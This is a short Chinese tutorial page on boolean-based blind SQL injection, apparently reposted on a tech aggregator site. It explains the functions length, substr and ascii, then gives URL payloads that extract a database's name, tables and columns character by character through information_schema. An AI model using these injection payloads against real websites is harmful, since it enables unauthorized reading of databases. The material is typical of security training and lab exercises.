[大数据] 布尔盲注

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> 大数据 -> 布尔盲注 -> 正文阅读

[大数据]布尔盲注

布尔盲注常用的函数
length()? 返回字符串的长度
substr()? 截取字符串
substr(a,b,c) 第一个是截取的字符串，第二个是截取的位置，第三个是截取的长度
ascii()?? 返回字符串的ASCII码
limit a,b? 第一个字符代表查询内容的位置，第二个代表长度

布尔盲注原理：
通过网页的回显来判断读错，可以利用and < > = 来进行判断
sql语句：
SELECT * FROM users WHERE id='$id' LIMIT 0,1

爆数据库
(1)爆数据库长度
?id=1' and length(database())>10? 若数据库名称长度大于10,则返回true,否则flase 来进行判断
(2)爆数据库名称
?id=1' and ascii(substr(database(),1,1))>number

爆表名
(1)爆表长度
?id=1' and length((select table_name from information_schema.tables? where table_schema="数据库名" limit 0,1))>number
(2)爆表名
?id=1' and ascii(substr((select table_name from information_schema.tables? where table_schema="数据库名" limit 0,1),1,1))>number

爆字段名
(1)爆长度
?id=1' and length((select column_name from information_schema.columns where table_name="表名" limit 0,1 ))>number
(2)
?id=1' and ascii(substr((select column_name from information_schema.columns where table_name="表名" limit 0,1 ),1,1))>number

大数据最新文章

实现Kafka至少消费一次

亚马逊云科技：还在苦于ETL？Zero ETL的时代

初探MapReduce

【SpringBoot框架篇】32.基于注解+redis实现

Elasticsearch：如何减少 Elasticsearch 集

Go redis操作

Redis面试题

专题五 Redis高并发场景

基于GBase8s和Calcite的多数据源查询

Redis——底层数据结构原理

加:2021-12-05 12:06:24 更:2021-12-05 12:07:03

360图书馆购物三丰科技阅读网日历万年历 2024年11日历

-2024/11/24 10:50:23-

图片自动播放器
↓图片自动播放器↓

TxT小说阅读器
↓语音阅读,小说下载,古典文学↓

一键清除垃圾
↓轻轻一点,清除系统垃圾↓

图片批量下载器
↓批量下载图片,美女图库↓

网站联系: qq:121756557 email:121756557@qq.com IT数码